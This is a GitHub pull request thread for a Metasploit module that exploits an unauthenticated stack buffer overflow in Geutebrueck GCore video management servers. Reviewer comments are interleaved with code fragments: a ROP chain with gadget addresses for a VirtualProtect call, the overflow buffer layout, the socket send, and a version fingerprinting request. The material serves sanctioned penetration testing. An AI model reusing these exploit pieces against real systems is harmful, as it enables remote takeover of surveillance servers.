-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added Geutebrueck GCore Remote Code Execution for 1.3.8.42 and 1.4.2.37 #8747
Conversation
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You don't need to require msf/core
## | ||
|
||
require 'msf/core' | ||
require 'nokogiri' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You don't need to require nokogiri
], | ||
'References' => | ||
[ | ||
['www.geutebrueck.com', ''] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Invalid format. Please use:
['EBD', '41153'],
['URL', 'https://packetstormsecurity.com/files/140762/geutebrueck-overflow.rb.txt']
And add any other references to the advisory, PoC or exploit if available.
{ | ||
'Space' => '2000' | ||
}, | ||
'Privileged' => false, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If the exploit results in SYSTEM
then use 'Privileged' => true
'Space' => '2000' | ||
}, | ||
'Privileged' => false, | ||
'DisclosureDate' => '2017-01-24', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Invalid date format.
Please run ./tools/dev/msftidy.rb modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
over the module.
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") | ||
ensure | ||
print_status('Closing socket.') | ||
disconnect |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you use Msf::Exploit::Remote::HttpClient
then you don't need to disconnect
here.
print_status("Selected version: #{self.target.name}") | ||
target_rop, target_overwrite, target_stack_align = ropchain(self.target) | ||
begin | ||
connect |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you use Msf::Exploit::Remote::HttpClient
then you don't need to connect
here.
else | ||
target_rop, target_overwrite, target_stack_align = ropchain(target) | ||
begin | ||
connect |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
If you use Msf::Exploit::Remote::HttpClient
then you don't need to connect
here.
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
print_status('Exploit ready for sending...') | ||
sock.put(exploit, 'Timeout' => 20) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Use send_request_cgi
instead.
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align | ||
print_status('Exploit ready for sending...') | ||
sock.put(exploit, 'Timeout' => 20) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Use send_request_cgi
instead.
Review changes with msftidy.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The changes were implemented. Except the implementation of the Msf::Exploit::Remote::HttpClient due the special crafted request.
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This module was used due the improper handling of the http request by the webserver which were written by the vendor.
@m4p0 any status on the documentation? |
@h00die I'll take care of the documentation. I can't provide a vulnerable application. |
would you be able to supply a pcap of exploitation (feel free to sanitize)? If you can get docs, a pcap, and 2 space, i should be able to look at it in the next few days and hopefully get this landed! |
@h00die I'm checking if I can give a link to an application or a pcap. But I will add this as soon as possible. |
'Privileged' => true, | ||
'DisclosureDate' => 'Jan 24 2017', | ||
'DefaultTarget' => 0)) | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can set the default port to avoid needing to set it at exploitation time. See
metasploit-framework/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
Line 33 in 12198a0
Opt::RPORT(50000), |
end | ||
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Change to:
print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...")
|
||
def fingerprint | ||
print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') | ||
@doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
"http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
return Exploit::CheckCode::Appears, mytarget | ||
end | ||
end | ||
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Change to:
print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.")
end | ||
end | ||
print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') | ||
print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
change " to '
rop += [0x0000000000000400].pack('Q<') | ||
|
||
# 0x140a88f81: | POP R8; RET | ||
# 0x...40 | Value for VP "Execute Permissions" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just wanted to say that I appreciate all the comments you've put in here explaining each thing. Very nice!
end | ||
|
||
def exploit | ||
if target['auto'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
unless im not looking close enough it looks there is minimal difference between auto and target selected areas of code here. It looks like if its auto, you check and then handle if its not vuln. From that point on, looks to be no changes, so we can most likely shorten up the code by bombing out on unknown.
I think this could really be something like (pseudo code)
if target['auto']
checkcode, self.target = fingerprint
fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown'
end
target_rop, target_overwrite, target_stack_align = ropchain(self.target)
[throw exploit with rescue and ensure areas]
I think I was able to shorten the code. Thank you @h00die. I think we have to startup the whole testing environment to verify that the code is still running as expected. |
If you're able to get a PCAP send it to msfdev@metasploit.com and we'll review it, match it to the code, and land this thing |
@m4p0 just wanted to check in on this PR |
@h00die as heads-up we're on it. We will deliver the rest like the pcap and tests for the working code during the next week. |
@h00die as told yesterday the code fix were made and tested. PCAP was delivered by now. |
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', | ||
'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you multiline this. See https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/altn_webadmin.rb#L14 as an example (or pretty much every module)
'References' => | ||
[ | ||
['EDB','41153'], | ||
['URL','www.geutebrueck.com'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Maybe add: ['CVE', '2017-11517']
'Targets' => | ||
[ | ||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can remove the () parts, or just do (Win7+)
[ | ||
['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], | ||
['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], | ||
['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can remove the () parts, or just do (Win7+)
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
you can shorten this to [Opt::RPORT(13003)]
# 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' | ||
rop += [0x140ccb984].pack('Q<') | ||
rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
+=
to <<
# We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
# 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' | ||
rop += [0x140ccb984].pack('Q<') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
+=
to <<
# Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. | ||
# We want RCX to hold the value for VP Argument "Address of Shellcode" | ||
# 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; | ||
rop = '' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This line is the same in both, it could be moved to before the if
statement.
overwrite = target_overwrite | ||
stack_align = target_stack_align | ||
|
||
exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Instead of these single use variables here, could we simplify:
exploit = 'GET /'
exploit << "\x41" * 200
exploit << target_rop
exploit << payload.encoded
exploit << "\x41" * 1823
exploit << target_overwrite
exploit << target_stack_align
I'm also assuming you couldn't use the send_request_cgi
? I didn't go back through all the comments, figured it was discussed there and just wanted to make sure it was.
print_status('Exploit sent!') | ||
buf = sock.get_once || '' | ||
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e | ||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I would add a fail_with here as well.
I checked over the pcap, looks good. One last pass through the code some things were bothering me stylistically. Once those changes are done, i'll land since the functionality is good. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
All changes were adopted.
looks good, i'm going to give it one last run through tonight to make sure nothing functionally changed (doesn't look to be) and then give this a merge. |
Thanks for your support and patience. I'll def. open a beer when this module is part of metasploit. |
go get that beer. |
Release NotesThis module adds an RCE against Geutebrueck GCore. |
Thanks again for sticking with this, it took a while, so I (we) appreciate all the work! |
\o/ |
I had a ninja edit, your spacing was off. 7ad151e |
Geutebrueck_GCore_X64_RCE_BO
Metasploit module for Geutebrueck GCore "video management" system. Tested with version 1.3.8.42 and 1.4.2.37.
Full remote code execution with NT/System privileges on Windows (Win 2012R2,Win8.1,...) with the installed Geutebrueck products (GCore).
Authors:
https://www.infoguard.ch
Luca Cappiello
Maurice Popp
POC: